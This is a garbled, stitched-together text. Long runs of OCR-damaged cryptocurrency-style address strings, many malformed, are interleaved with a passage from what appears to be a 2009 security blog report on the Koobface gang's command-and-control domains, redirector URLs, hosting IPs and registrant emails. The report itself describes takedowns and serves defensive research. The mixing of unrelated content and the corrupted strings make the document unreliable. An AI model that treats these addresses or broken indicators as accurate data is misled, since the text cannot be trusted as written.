1DdUKKb29dVy6UrBgaRu41mKCf7NuTh1laG 
1LDDYLiurH7Vyud8774UpwdNSB1Xu56sP3w 
1DE2byxU3sXMvXbQhMDBu8FLDzc71YLr3T 
1De2hmHPVfGnCTUKcmTeghnR1PX9KvxkbD 
1De2MSErJVVWMY67e2Lwn2LaPjsocAbGMa 
1DE2ShecrtpRPGN6wLpFiPraJ3WZdoYzfY 
1De4Je28XLpvfGcsu3GoxX74v1Tkgtp3Pn6 
1De5KHiBibPWNyBfwwsqFD]35gypPhdgBN 
1De5Pqb5T5DM52CpQXFHt4vntuk6r9yrKP 
1DE74u9cmDyhsAFHPbiaz4DWpH3ksn9ONRq 
1De9V5JhnXm3Usgu6oJbbHi5a2ziLSn3r4 
1Dea7FbV6yV3tuMSWhPCttQ3Q9SMj2h9B3 
1DeBePBtYE7g4PyLSfC51pZDNhSNfuce4t 
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1DedkK945FAqzqniz57S5sZvmPMyigPXujQ 
1DEDZur8demx4Nb7VFBDweYPcQoEByQQtT 
1DEe3A9xWPdgm49BmMKojRYAnLMDohekdC 
1dEf7ErxXFXa80KmQAD7UcdCR3zArCkwFN 
1DefuToGxkrgY38xpzyQVvYaAzJ3Q5s1XE 
1DEGbwXJwcWhHxbw355XJPGequyRupBpq 
1DehtMwjTaSLPAfnHRjsubB55)J3kVuBiMe 
1LDEiIAbvToEZDSvsvwzTdGz6B]6gc9Wv2PB 
1LDELHn3iTs3DqLuxTQ5tQYreWXoefkKqtbd 
1DELjtl1fquAUPm2wLqLuqWyNKYfQTCRFevV 
1DEm43XxxahtpYoWsrxH9sP7kiccn1iLqiw 
1DEm5XcU2th1JZw4YNMc4Ausg9NK1qLpaC 
1DembDSzntTRhAmLggxZHPTQHtydR5Rv/7Z 
1DenaBzzHpKZgC9VIEKtDKqae24zrJdUph 
1dePthDuEenuwASD7kmATcPsAqj7yvKHM 
LDEqPWUke5jRBHZ2ffms3ae22F7UU099bo 
LDERdww2E9hcC4NMeSvrdfPTTmMVNRWbIJA 
1DeRhFxQVB5H8gZP61VZ9zZWgVFnuT40oRMW 
1LDERnbRCPpjBSGbujfER9kK6k3L4FD5MAdR 
1DevjunAQBJsBfdo1BQHbJSHUN8THK5dBx 
1Df2Kj 7UYjJSUHPqXE7RDxnjbwddJRXYagZ 
1DF6i4UfBdCjmunsJHMJTva8D3RYdvSMsr 
1Df7ryneUZ9v1SSnsdbCmg1N1K1d7Z2uPe 
LDf82K9nNT2hgfvEnz2q4ebb714sAtmqvMF 
1LDF8rDAnLxuYiyriuixtwy7e22rfTjoNjS 
1Dfa3F7vXvUGSXaNtGQjFTvcsshNtx5LRZ 
1DfAavKsn36Te7FHSrzoxXbw9osdPT xeVu9 
1DfaBtVeTBzpZRtFXge7 UMKWYDn1UWACcTA 
1DfaCJ7HnFMuCoTCS3fuep3d7wE8DgEadT 
1DFb7qaL27BBAxT6zm5tgazamXKWXHWBi6 
1LDfBof7rUjhqKkcR2iY2oRTs2wjyDFKUuX 
1DfelEe5pR9jrxXUTBwXppyJnE1u94VHXgS 
1DfemzUiLfkCddUerhPBs34egeBVxWFcPS 
1DFFRTVuDdWvqaiEwLafutVBGzD5Ppi3qf 
LDfft5YTctcR9qawA6NMwtpshh9JQirPW2 
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Kuku Ruku Koobface! What does Koobface has to do with a legendary cocoa cream wafer 
[18]Koukou Roukou sold in the 90’s? It’s one of new domains introduced over the past seven 
days (kukuruku-290709 .com now offline thanks to community efforts). 


What is the [19]Koobface gang up to [20]anyway? Despite that they’ve randomized 
the automatically generated directories on the compromised sites (kimchistory.freevar 
.com/fantasticfilms; tastemasters’ .ca/freeemOvie; simonsoderberg .se/mmymOvies; 
ekespangs .se/meggavideO; akesheronline .com/privaleshOw; belljarstudio .com/bestttube), 
the gang continues relying on centralized hosting for its campaigns. 


During the week, they’ve migrated from 67.215.238 .178/redirectsoft/go/fb s.php (Pacifi- 
cRack.com) to 85.234.141 .92/redirectsoft/go/fb _s.php (BlueConnex Ltd), interestingly, they 
did so with all of the their currently active domains, the ones used as central redirection points 
on the thousands of legitimate/malicious sites participating in their campaigns. Interestingly, 
merely suspending a domain name wouldn’t get you [21]a personal greeting from the Koobface 
gang, since they'll basically register a new one. Getting them kicked out of several different 
hosting providers simultaneously would. Upon having their newly pushed domains shut down, 
the gang stopped using domains and switched to the original IP of their hosting provider, once 
again requiring a direct ISP action, instead of domain registar’s one. 


boomer-110809.com 


glavnij20090809,com 85.234.128.0/19 ——————“S_-» AS29550 


piupiu-110809.com 85-234-141-92 static.as29550.net 


$uz11082009.com 


Koobface C &C, central malware campaign domains suspended through community efforts: 


- glavnij20090809 .com - Email: bigvillyxxx@gmail.com was parked at 85.234.141.92 
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1DFgha7nSfMsaDdtaiqYHQN6y5UWXu8kF 
1DfhxMMxRd14eaWxwqQ7bULFsN1MmqiTQ9 
1DfiCksHJCHRs4iLdaD6ecY2yGPNcHmé8aqr 
1LDFivYucLMBYMqYhJz8ew8cdixefvtWhTv 
1Dfj8vdhuMVdrTi2Dx3PMQDYCtmN6Ae4BH 
1DFJM42aLtWakr2LK4XuEPMTvbq29iY9n8 
1DFLf39aUxuaiYct5g2Qs5e5r44bygiowL 
1DFnLddCvsj43tomgd3rY58o0r3x9pA57Ye 
1Dfq4wcnyttZL91DgF2zT14ECbiqa5wHQ1 
1Dfsla7VRFqcjMFzvawMKWblisTKf84Tj2 
LDFSgTBwE4j4C7PyP3MnbfkVfSHWaxPACK 
1Dft/JhH5WeyvM9N92A5F8yuWZ6qBFTVQZq 
1DFt}kmPfMHsoNAplY2i9AUU3hghhT5hVY 
1DfwbvkpQFLUfp7YWuroFgUsMrcJmRKwWN4 
LDFwhjTRL3bNxLx5cmhEJJMoiJMZHiEAv8 
1DFWXz6XqjEtw7EZ5YL6fmbueuruvKvRe6 
1Dfx3R7wG38CySxFfftiM 1tu5BfLnd88Yf 
1DfxkKMZBn3Dmi6gvF8s1XHnAWZCUNKMuwo 
1Dfxu7Fj3VpUSSpPHSvzayphha2WNMfrg1 
1DfZ8P2MR23SXF 7akK8jBrd87 7iFHj2Hkj 
1DFZRGV494eUZ48QBgakx7eGaDC3SakCJ7 
1DfZucLWAgSkfVncHRNaot99xuCyQSDKWg 
1Dg2HJCyFmMgqNrhtTNk2fER6R8fw8m6KZz 
1Dg20VUSVbMAHSxJ4NjakrHY9q5swMRg3x 
1DG3b6j8SpflkoYZyjjLaQwHZvcMzYnD9i 
1Dg4vPNtTnnuBuu50Vz4YZggJBEGLL3Wo 
1DG5mfLK6fccR8MBHk4KnyUEuvoL3GpSVc 
1Dg5x3yCh1HskKvhluc5h4kRzxUP416xpGo 
1Dg64rrikktZ7sx4Nfs5BdktTbf5s9smKU 
1Dg81V8cr13n1BptqUArRmyg6Z3M1107YU 
LDg9NyHGKyNtYpz6CAVh6fxwHgYno4AzCs 
1DGa3Mv7FP3jSHZfvL14t2btPgP5RRPWdX 
1LDGArVsfBwnTadnkK7Pbq4VrSrm4v9D2qa 
1DGBYSn)JXsJZve746SLFmcvyxSPUajJLS4o 
1DGd7QTaLpHvPFc1lixSQCQfmcN8HTgHA4ANt 
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1DGDyiUyesHjVj 1lsEnVD9VPugsvgx5Uga9 
1DGEFpwE2mXarhafyjfCdeWPNAJmQhkWt7 
LDgERpPznNHrn9UtcQosf]FFszH36gDPx5 
1DGF17qndKsbZ5dngAErWswVzoVLYwJZSr 
1DGgkaP4KkqYFCYkKh3VQYfisQUW9ky79m 
LDGhfYoNWDjyYcEcdqTKJgrFMZPSLHFUcX 
LDGHi8THLpK4AKBDfXcR8GWiwxTybaVp8E 
1LDghsLpULXHFk46amHwUd3zcRgQxSdmDGb 
LDGM9nXvtPyQCF1AjtWjK4mjpFdxb3PJ5i 
1Dgn7j9yU3mcxLQcAywneNbiZGiex3JUx8 
1ldGnv9B3CESSdWofas621f]F2EZ9CYN6F 
1DgPQ1lucCtANyxaZT 7 bdjUfB6pmMWnjG1J4 
LDGgBVTSqS4iJZQVcsm1HSxc5xgnX31Aov 
1DgRSfyr887UwjSSL7ftv4LzHtmjjLRAj4 
1DGs4ipTBeFsxXrB82e2YEfa9swsVbnJEMX 
1DgsjsE1Xx5MDMVSDJWM1SMxJ9cL6WFTW2 
1DGTUcs2uxwBbjNEh1VqzHbHr4AvE62bYV 
1DGuHfYhQaTDBLvp8VRz94M4yJQkqqmalp 
1DGVaVYRQWm2YnWBAUtvnmLMfQMEycS6Rq 
1DGxqYkJidj9Y¥kKRobnCFcV4dFAfCWRETND9 
1DGyeo4negY15upR32j)CxqccuBYZouSps 
1LDh1YnENTmpgoxahpy3W9bMybbcmM9mVc1 
1DH32kKGQMVUL5JNeSphZcJ3R86vkQsTgm 
1Dh81dNfYdArpsdfuVNcLSyEDPqDjTHo7i 
LDH9aTDUsdXzZZEQ2YFXFZqewF8Dc7NswFs 
1DHa49M3DMgtXytJ52shWS54mDPDyiq6v5 
1DhaFLBBYuAXxLaUxmAnm4yRZABSrtfttv 
LDHCNewHhviSQ4vEbxohifzpcc5GtTsurw 
1DHESwFZTGBtYaLAVrD8FX4UXaxhc2hiYt 
1LDhGAjgPfEHRHseCFVRw60n4pHcé6laxKVu 
LDHGH9HH2NiKOKHTLhYS3B5QFS1ImW8hJEc 
1Dhkz8P4H1nU5CvBZEbAZL7630A000KAZA 
LDHmBCXzuYbWn7D5m4qgAAXU7xEyUACKReC 
LDHMq6ApXpF3qjRKKxzja49fBTj5E82xBa 
LDHMRT4Dxhf1ASkKz3RyiEJHFCZTNrBw8z 
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1DHpyo5Wa5jS8Ts7179STqyo2U1ZGdMNuC 
LDhQub6py3Yr3)JqvP6JwdcMzzyoxtP4dcrL 


1DHrMdxu5EcwGBKCKwuEEgSeMudModWdGu 
1DHtrQYgBdBTXWgP7msNhLBBd4DD8g71Xm 


1DHu2mAZzzugqSC4zd25fSGC6JQiYfZzH6V1 
LDHU5aArhCXJ5TgjquBAkpC1R2FknVeDFe 
LDhUK5LH56bNTgJQMUjKCTUQTVFgVEyuoW 
LDHULPZvrGkVPrLF5xL7Fzdycjb4XF1HFa 


LDHUM3CQ49yxEXGYPN4NeY5pSRpv3BXHNF 


1LDhv6CNsJQxZXqcfqmKtE7xFcd8BeQCyfd 
1DhvMvokE3CrbyLBLQFdS2hCWLsWiuyTG9 
LDHVvRWNUuHBSXhp9jnefygzLN8WindyseNh 
1Dhw7NqCB3GdeZjn9MJwh4i3qqFLmMW3D7H 
LDhWSfE7vjeK7zwqxDS5x2dEDWqtCPnZeN 
1DhYb9qk5Q30F9vg3NWwyoFnzvY4k6iDeR 
LDHyYZfUgFX3p4vgyKjqge85cmHqmaQr9yZw) 
LDHZJF6Yhfw2QPc2uaZDFCRQS2auAPEpnr 
1DHzr8v6RR5koHTrih7PUIS36pE8SEx42D 
1Di4seCmxvNu39nygZhoSGnDp6SRpnja8y 
1Di7qgjPV5gd6xlyWJodMPG]3mmqS8BUVLP 


1DiepECH5TCMGP3b9eGKRGvvcvGWm1SP5z 


1DIGU7QX5Sg9YS4CP9QxVe7yoQc42nEzct 
1Diidzqs9V29fYREGwwjF4VThn38vZd6CD 
1DiiQ8jp5ss7zifZ5GK7V9WRUTusGz4GuUi 
1DiJVtLVnDR1dyB3NWFfAJtbBJZWjjWw4kw 
1DiIMM75HghsJDfnLGyRJMfNMDPvgkZ4t6p 
1DiPGiqYVaL5sDcpNnRCMhfgJPuFvwcCAe 
1Dirf1P9aYkcbjmnj4HZHZNB9zZtLHZknLN 
1Disosy9fA2JaX8k5C9bvEzuy98UwyKfwm 
1DiIWV3JHYmXfTADhRzpcBrNKneATey3qxB 
1Dixah49foUoscB3Tg3b2fqWTD5PcLTEVK 
1DixahMLGWVATIYixzUmM9MdX3mhb7d8mMmJL 
1LDiyNA3miLUrQJ1T3nHGCmWr1h8byhYACU 
1DJ2nZGCAMHKYcue5K5DdkWkchuXq3Hgi5 
1DJ3hAVRc329iBpBJjgRgsaDVLxxX3EQCEc 
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1LDJ3hjdcFdBjQRup9MFd9ZtXpwWv9ycdgm 
1DJ3hnUxM5FjsSH23XizZNCUHROG2bMSErt 
1DJ6J9FxK6EWSQcrsM69weLsgubxMMjEOCY 
LDJ8EYgsGBojcHQU8d412JTiIKYMnySvsgX 
LDjArtNtwZ8HCDMHTZfDc6bnpcVA50GbRL 
1DJCzEbnerCYPe3WgSjuEDingTnzxPHPcm 
1DjDbknxzofxsQ)JMZDJc5 DwZECy6KVH]Jsq 
1LDJFeHP6fQvSb3YrF7rTS5WWCHf1D4PJkzL 
LDJGNTFauYCWQdiM6cB2kwPLmfP3gIrN4t 
1LDJk4iHAU962HTj9fciIQ8kK5aUPTQCihBSZ 
1LDJKi7cQsksDS6FXXNW6NzBctCynNfReNT 
1LDjLXiqJr3JSJDUELpa2GS1qtwYjfca9TD 
LDJNi4YumniBDQjJSNtWWMmkErskstb4XaR 
LDJNTTtvWu7NQ5oFKMgeti3gLUorJocxp8 
1ldJNZZKqCT4qnNRm5WBWowtcUM2owxhde 
1DjshGrDYVo87Ja4DxpfCof3FpUZsDQpZM 
1DJTb8SbsvyiF97NLgFmKMPEUwtTcfocsnt 
1DjuPbpdaGMbf6x6A89zimte3y4KQHMFYy 
LDJUWN4Jv95FF7AuzGqZBhEcYT1HN1y3ho 
1DJVmbjA6q41cd7X647dLDV8BrxbarY 3sf 
1LDjvMsiPZJLCREXhJaMSYdQHtvCTknYnyc 
1DJwfeTT7Eixcj33FoPZmMoZhHARASbJ3FE8 
1DJYessZEMWZHMmYAU4LdT9YBa4C9niV3fT 
1DJz9jzkq2L28HnooGfMdBLcfaebYN2YNt 
1DJzAbwgtRAiTGKoeHNVH2ebc2Y7Dxbf5K 
1DK3cdYFgVzPDSBmC48BNZMAZcKHtMo5H6 
1Dk8XERnzAkR5dtt/hnjzGA559xDYjnaVE9 
1Dk9VRnpmx4MRQpoNPDpHAYDkKNWSdbyJRi 
1Dkbd2mdcYzDtMK4cnrWU3WY9AY96jLM8b) 
1DkbxjN6qHycEdsJmfZERBN6KFZMP2tMLP 
1DKdipNLZM6iY9nkR36wRKfzS1RZ6KtbKq 
1DKEsUtGtbiw1fkhrdG8TePprxzFSHrm7i 
LDKEW6WyY7N6GXtqNHi1l5ygwWRpfpZZ9R1 
LDKfrYk3UKcBWfX8Uq2ejTnNsZR4y4VyyG 
LDKFUU5N5V87ThYgW3Y05FvwJ2fyZnaNfE 
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1DKGfNi3aDc25d8hruHkwLB6érzLmo1SpqH 
1DKGtUNo11TneeWpd8697CRWUeawjnxWkKh 
1LDKHJa2YXtCsB8xkWs47L9xpUrvfv7geiH 
LDkhKbMLbj2xWjvYe8X7CvghJCrY5y4P92 
1DkJvwC6CekQgJPjCQnbgiL3VshmZShoHP 
1DKLHCucmbrDbRNFgFUMJLCqwwTFbTBicc 
1DKmzuoehANR7RL3BvCKiV4biCDJtVztRY 
1DkN9c7chTQzpheBzf6ébbjghgtkc7eF45e 
1DKNfe8j 1WwwBMXC5VBF5szRqc4bjeiJmJH 
1DKnv2HWYxJQtKgnxCeFPZw9LopnQkv2D1 
1DkP1XnHQpJGZPmvAaYLZozgqMzFTXwdh4 
1DkP4qJfnnw6RyyCGruiwzneAknoRSfW5k 
1DkpeNg5FAhcgMRa2QYzyKZpuNuhFPCnXH 
LDkpQQJVJi9_LD4DToC5KLyAK1HX8BsvNb} 
1DkPUvVQSUWRvz5XUNZ9vfZFTFe2MwQSTUA 
1DkQmgQ7s55SLzrfvdV9f5PEytmUsvgKCz 
1DkQsqJ5sEaGmf5v76CwNLqwcnXp8CsuaS 
1LDkQSRYjakuEKvgq8TvhzyS2Spp5JcofiWR 
1DkReqvsmf76za6PY9LLFFMEGpV3q2AqT9 
1DKtnCiWezpiGEpiAbCM5vX3rkaoCamYgt 
1DKU8DibVfbvuC2ZbLECHpE7K4gtVvk9N8 
1DKUJQ6DqGu8zQquiapeqEAzvyds6Ec6q 
1DKUN7BZrPsnUybSmG8avNPLrNonU7N5Mb 
1LDKYh8WrNktRFcpo5aUS1PMaDfyNJ6SciA 
LDKYZN3uUMxEQiNGxNAgbk7e8nx3YHgmuSn 
1DkZNZu34fkC8x6z4GaSh51kCB7s6JW2BW 
1DKzrMWyoBe9E3ZEAVE2T54TA8zcifsNAw 
1DL11fuLMf9ZHd4tPUtHVo5tZHWp4meRu2 
1DL3Mqq9bkrCuEFSsAx6ySkETRNznkFL6E 
1LDLEQ3fjjeVNTZBSFsEgey12jguk9pPC6U 
1dLhRPv7kJVikhpajoU3zZ4RTBaG5y1PTZ 
1DLirXXK44xWtFAB8DetXuPKQ9SewjEx4y 
1DLmMX5MBGHiwMRsaJVdH7qKd2KedUsVgM4 
LDLOWHYUg3FJsae4JTJDCibDRSxjWV72S8 
1LDLqEwR6zujgfyoYwFs65PcE7Cz3GrFyer 


25a LF 


LDLRw2pYQgYfbeLkc7oPuKpqkQjo1Pu16P 
1LDLsv3RRyFLNdUmDLhYviefgtDaVteS2fQ 
1DLU5DHtL33rRXhrfBSTLP1ZgvWBZoWmijf 
1DLvLQGaJSqqC55RXSCAfmBWH83DGpCFEE 
LDLXHubWNarbKogLhWHyjaeVCjTKP8gdb4 
1dLzd3K5wBFUu5wArkzmjAzidoQrrSYGh 
1DLznr1HD97YZRINP5nShqEqNkLye3K6Aj 
1Dm13yaBraDMH3D9f7tSkPJszf8Em2rkUd 
1Dm7Z3zDtJCNRoFt86u4PWTFatMkb7xqd7 
1LDMbaXCQY69qtSk9rB3d6WvbpUvgHwQBGd 
LDMbSy34PtEjCepacF9EeUVMxbdYCsFJQk 
1DMBVtH3yL8u2vd9BPeB7L3cssjZpAuJsw 
1LDmMCMKDfkBN4ZPuTURITyNzipuwCJ8MHal 
LDMFAWDNhNPgbQJ2jF6SG3EPdBIcpqrwCl1 
1DMGGDUBwjLda29rjoNXTdhTJXnUjeSbEi 
LDMgQyobL1Q8o05ztZ3Wk]JJKg2chbuQ35gi 
1DmhcYjevcMVYhtbDAThHNciAYH82mSLumi 
1L1DmHaqr8FEtCdnC2EGGurEvddHDjJr3QoLf 
1LDMJ6rFwEVqXWyQh75Zu3a2VBeTdHDFfge 
LDMjT3WwaArFfAzdJhURxx86qngpSd8KsFL 
1DmJVgF4GJRg5noZd76pDvY1p6nVGrfScQ 
LDMNBP3kVjDdQ2rBcpKrfRfgHfFYNJaFVN 
1Dmo1Pjgk5J97WmzxP24GDHY1fuvb5VwVg 
LdmQ4wacGNHhxXr5MPSWpykKyjxw1jTHWMF 
1DmQjsFpqo73usn4d7PdFc2FZ5aa6WiXEs 
1DMrxUHUgeWJXWM4Bjq8BWYfChxXfLJnUQr 
1DmSi3znr3RrxXMYMHGsWPHiaPAdGi3pUj3 
1LDMsWcHA1Vb40Z0E13U2WAKtK8xx42Rf8G 
1Dmu9fvBxHpkzzeLM8dj6SDfCednHbAWgj 
LDMWYJjA5tecTicFNa5U9gm6qWHm1Vu3Vz 
1DMyS5KL1tonZccRmMuVUT2VMuXboKBzd7E 
1Dn38hGSjid3Az2rVAQrZV5FoSgLdLELv3 
LDn6MRVW2siBLhHNR5LDT7zZJVnZiLyyb2bN 
1LDn9YJsL8pHk6XPtk95qogrBNiV4uMCvtQ1 
1Dn9S4bZFb350nHVfgQJ2tNSvVRssFDY Xu 
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1Dnbzz6LC9OWQtq2ZJvzWZPhndxZ1MZ7Ad 
1Dnczc68yhkWj16aSrFs4ZEqrcCXtFkhW9 
LDNfj2U5X5saBZKqqT/7s2CKhWtaCxjtfq2 
1DnGY1gYmjJolwfV1C698cf94DHvJ9nhBs9 
LDNHq9H9WPKcp4kd6F7GQzZWcaemW1Pkx7 
LdNHx2uYhFbKW9XqdnHNKtUUk2uLWvyT5 
1DnK5k67GMRMmH2ByCyhHJCZT6jSYYwkdxQ 
LDNoSQwg930Y63AqWgApoxiSxXJwehgLzBU 
1DngjfPTaKtYYQGFNUE7 7fhW92NfPBFs97 
1Dnrd4hGfQ2)Jx6RfukG8H5FGSyXZHhjFW7 
LDNsi5EeKASzxK3jwLVdxiprxWvvzyMgj9 
LDNsM3ftnrsTXm5jgA4thY83]2GoR6MqPB 
1LDnSnGfbCiLjJRQSPSIpf6utGjJ9XbMDé6ta 
1Dnv9xbjrSVZof|fWwBjiY6mXbTQraeU8Q 
LDNVbEJ5PbBs43gp285qnctMpXTS5vNh7g 
1DnvdFXsZjGFrVLUUXYycVPBYAYus7LtyH 
1DnVoS2ntCSSmCwF2jByQXWBbXBo3x2wMB 
1DnywzZHAgkKkyY 7WgfG1269dg5ENbwYZGwat 
1Dnyz1TqkEWGZdowH1KjdaRGQxXrUWeG9Xy 
1Do4UWCdJeGdtxqGU5xewy9vwxXF8URWuB 
1Do5XQH8x2ACXdhLXEs43KNijobRnNG7yk8N 
LDoBhVPwKCqNW4aHNeQDesjRrV6ddDyPJZ 
1DoBZUjBoQsvENmHn2g6xSBxxzug4fwXxX2P 
1DoCanzGHnBYDvMCgvLEBBghuToKPYcMF6 
1DodGTVXrtTsMkeX7 1luJQZgh1libqgaUATB 
1DodvkSftaY3fulvinUgpdkpbumwBKd2Lq 
1DoJcMwDwTCdk1CtzMe4zQjtX2rBDooZdk 
1DoL3eFisdv3NyDyJSH6D7WDM7SMYCEHez 
1DoL9pA6RL4AukLH5j1mZCJQUrM6AnNCwy 
1DoPqR7mTyeaDfox6FZREQWer1c4XFqirS 
1DorBaeejaHGnohxKcfGhhTLIoT9029ALH 
LDORWPqYKLFp24YQHSFTvJB4EzYJQBxAp4 
1Dotg5QFEgeUW6AHN4iueeEy5z6ehh8AYW 
1DoV7qBwuXecF9UWNHA2zu2n3aWLZCQaeP 
1DoVD4aaohtGTUWWhal16aYANckqFNDwsno 
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1Dow6cjprBdo9jthW63t1QEgC3boH6bZUd 
1DoygZPwKyusGk39xG20XVKbkFGwTp90SE 
1Dp1q1EZoy7ZtCM7roUNncVA8NirbveEUF 
1Dp4i8FJnFWCEedpfNMm72Thsyq9pFWVFn 
LDp5jWGTYnzK22CCbHLL4teWpXKqUuaM 7zr 
1Dp6ArsVdMfDsTpuB9LtjuWGwQZQgoHFLd7 
1DP7XHGB8pf22zZ6kWgE92NH3rrhj9K56CD 
1DP9HqGGHKPeaZx8o0g3HLYegjbQe2BpEUuj 
1Dp9xaJ 7vgpmaY9iyp9Xg4XDHZpX1lqnW8RP 
1DPA2bP3Agsxn1tguUg 7Judis5GTJjwuch 
1DPBgilioJS2exqRy9W7kNBWsxX9GDcyYnH 
1DPBtmXnMDyz1Pr7iE860P6nNMm/7QS5Ler 
1Dpc5buiqSJJwRDCaMYmHarR25BK7HJucV 
1DpeApMeeAYm15dP1J9ZZXNoxJmtgSjJLqv 
1Dpf4scF9eaDRFLtyP7esCMztF96FmorUP 
1Dpg6gWgZW7pzkkPhaVCMa9XX5gbc6dgDZ 
1DpGUvvPVwb3V6S6WfpDsejkpajYQw/7s]j 
LDpHwSMsRZ8kx2aZEmj9pFdHH1xffixxkR 
1DPiJDw6bzmVD3jDgBkWx5TyY8kBg7JyRi 
1DpmmxKomDTiF9ZOPHM60HQVnsypQ2zFXa 
LDPmtLMBgqtQVQaTRdWVisGmBq/7dNtpQ89a 
1DPPcBaxC9pioDRxiGb76HQNQR4p8tBjEi 
1DpPdLPqu4bW5fArw1GPCqhvVJmRulAYRA 
1DPQiNFfn3L5ZGVdzVCQuSRkUhhXhmDSay 
1DPRtByJWyqrGsex6cSSj5Vu5qRQZUuhQk 
1DpRuzsMwoMdeW5ZDRBBDGykKiTCr61g4mD 
LDPtCNfKw6i25dEvfg2Jhd15WCWMaR9U4w 
1DptYdJJgoWycMrpRrvQcY7HxJNpNBtC16 
1LDpweuMP4Ye5NPGsWk6QpeWXKtd5GFYC7M 
LdPwUZjv2fuWw8MCFm6UjYncQZimbHwx6 
1DPyVaqUyqe1XT81cgw1lqhH14NADaVEgFy 
1Dpyw43Ga2R5Q5d254hXpJhCT35yR7XWmH 
1Dq46ALhFpaEmSXoRdrwinSLq4mGXE9wKg 
1Dq46cdkzBBT4TFH8deVgKgGKcquPMDiCQ 
1DQ4fpskkSNQ7dPKzxrdP6TvmSKqe6GfeC 
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1Dq8xfTAxELn66xBPuza8NHVJ9X99kUqnj 
1Dqa8iszs7ce8U9ZHqP8pYg93AeQUoORnul 
1DqaSubPQH2R8qsBUAg3AbNyAQizax6ph9 
1LDQccXTx6G1PgCQVEXQawMrU9aTRkKAVgsm 
1DQcrNMo6WqE6xv3swCdp9m5ZDrV1sjQMV 
LDqCWY4r98VYDNbopnS9jnHuG5cDYynxL9 
1DQeJSLPgK8ruJhpkVqZ8cRfZ8x5EaDC9OB 
1DqH97bzNHJr9GgDMwrqdkMskKGXsPY6iU 
1DQi15kCBtSYEdGqCH5F1DTZDvpj6x1W9y 
1LDQi4swWSENMnSUNZgsKnzCz6U9es3YzeA 
1LDQjEZTxDyPpWLWFMzZiDAxDJRgpDk6QKf 
1DQkTS892eGPboyhytYwmW6bV9xI1InFS7yn 
1DqMCY4kqepTSXFRVaGaUgcNxcqSqcpqzZJ 
1DqmVDo2FCjXXRXcvFvcTqWwn1lFmNR6édqvo 
LDQNQNeGBfP8bGLJkdMSEBYz7rSViUVmM9 
1DqpdqkHfmrBDarriaHx8f1GqLnqh3M79b 
LDQpGEPwpVVkJH3eAYZVkWocbxrTYjzGN 
1DqqFV8Gk47ahgTpnuaGSSp95c4qGvWaD6 
1DQrQdJXsCPV4je146FceWVZ3Ed1FZSy24 
1Dqrs56cuMGLreA1LNyDqTzaofKFCrrBDWU 
1DQtj2zwjSvAC7CbemT 1Lia5ikBjcqVmB61 
LDQTmiNfHmLWSdsCCHGospmF4kFcNPv24T 
LDQTtQCUAGALBaqFFrto80YXQBuZUZyuy5z 
LDqU3NWULyDYKSSYeo42WSTQXRm2dPRQJ1 
1DQW7CYBPm4eTdFE7k4Lsc2CSgXqgtPdp5 
1DQXDF5u3zvHCtdqVdpemi6YtkKAZ6vcfhm 
LDQYob9Rh4cvCzVEpDHfjkgD4zZMWM9DyvA 
1DQzZF6KZeudNURZ84kR5XFAqHgtoTIMVj 
1Dr4z0G3B5xPaARoer30ap5ZzPKD8pNtvh 
1DRAAogXvkgtup7Y9bnr2sGMDUyhSfRPTu 
1DRaaZckuJ5Uc6E2ZEnisPHR8FriI PPVVop 
1DRbJQGK5cg7zGKtpfSoukfdVjEvL6Yi9r 
LDRbRCwxg2UywoZciMwAobX]3AGieNys76 
LDREtnQ1t15AgjKYAi2m5xAUf3clgqxXhaw 
1DRewFpJU7C5ueRzcT2apRr3CPDQetoPUU 
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1Drf5LMFty6z72aD4vcjRxvx3JFSdbYMet 
LDRGGKMqFxGXtMPJFxrHbviEw3dk28cjMw 
1LDRGWqq6Rex4kUjNRYmefCugDYRRrB2P2w 
1DrGzqusugQZkA8RuUB1556v11jo6TcwLum 
1DrHNHm5kUdk2QSaDVd8xFkewZiAmbnfmT 
LDRHtAxmmCrHmNHT7QMQ2ZJPgoEQdBLLXx8 
1DRhxYFkkexnry1JUpQU30zfyGd4Scz98m 
LDRiIUPMqqpnbasgkTvaBp5piJmigmMnraH 
1DRJUi4nL1PCMKRpgRPRyBLfodeNi23BxY 
1Dro2s9qAc3vpNCxPfG3b4St8f1GSJQxN5 
1LDRPAA6mé6gLez77PureMFiXhxS6rMg5Q3 
LDRpERrxjlvFcXPiS2oRLLTHCQS75wm3YY 
1DrPN4boBDCHGpJrhfAFURQ32GC5NivDhU 
1ldrpSL5sWZGb72bUwFJH30zBJzkTcqYyu 
1DrRgVPJpYnkjkKWPr2MPkUCpTPZZwa8jF6 
1DrRUx74B8FDVhouzAeZQreHQGEsswwXCQ 
1DrS6DQ9BU7KXP4VuSfoxiDMPMAaFUVbxB 
1DrUb3puQEgGBne7NnTYQyyHCStFoL5nfd 
1DrUESCjUDeHQXoJwttZBD6rSLUUMmB45ni 
1DRujzUTnZgEk5iqP3XiG1E2MBb1GngYob 
LDRWApm6CqNqiznWcmjGJmjJZGnVo8UKRHW 
LDRwqcEEUj608h30YSZHrmNZQeLLWTZMPU 
1ldrYdiNMpv2rl9Nom2kUcKUv3dqiWkKfw} 
1DrY¥mjYgLhahwjcmw56Agq4AaHLkMuVYeY 
1Dryznp6tnGyrg1HLxYeA6zhaM79yGm3o0Q 
1DrZ4LUJVDGE3yYhHUrxK4VQUxA9X7xcjV 
1Ds32Jhg5ZBafzA4NEqHT21q9F7Y5TAJhD 
1DS3jzLRzza7W44WkSpFFISNVSuuXCkvQr 
1Ds621peYnRvEJHjNVyUk5uYmGGLpf8SAr 
1Ds7MCeESLRLFCuyprkTKkMgt2cY9Y1QyD 
1DS91FSXf7GTYrWnENvFb2rksaB2d7nydS 
1DS9ddYWrPMiirAaThxZ7G34U6y4ripYoH 
1DS9PKn49Q39x7qdrGSYd5D9m54875uDHc 
1DS9WQvcyY6suYHpsNejLqEuwkdanxXSBeiz 
1Ds9YP6PojXMv9HZxh4yMf4YhdFQmBS161 
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- kukuruku-290709 .com - Email: kuku.ruku.pam@gmail.com was parked at 85.234.141.92 


- superturbo20090809 .com - Email: bigvillyxxx@gmail.com was parked at 85.234.141.92 
({22]Super Turbo is yet another legendary product sold in the 90’s) 


- bombimbom20090809 .com - Email: bigvillyxxx@gmail.com was parked at 85.234.141.92 
({23]Bombi Bom is also a classic chewing gum sold in the 90’s in Europe/Eastern Europe) 


- mishkigammy-060809.com - Email: kuku.ruku.pam@gmail.com was parked at 85.234.141.92 
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1DsC4D7YVRDWHUcrxWfgjMdGyqPP4myuyo 
1DScJ6A1cqbdHWNyuQVeVYeiWBaAy7uS7k 
1DScX6dbX215ajttggiCCoXRqSnNB8V1R1 
1DSdsZb2cbkrxfpLQdYcefxx3Wf4rfSiGE 
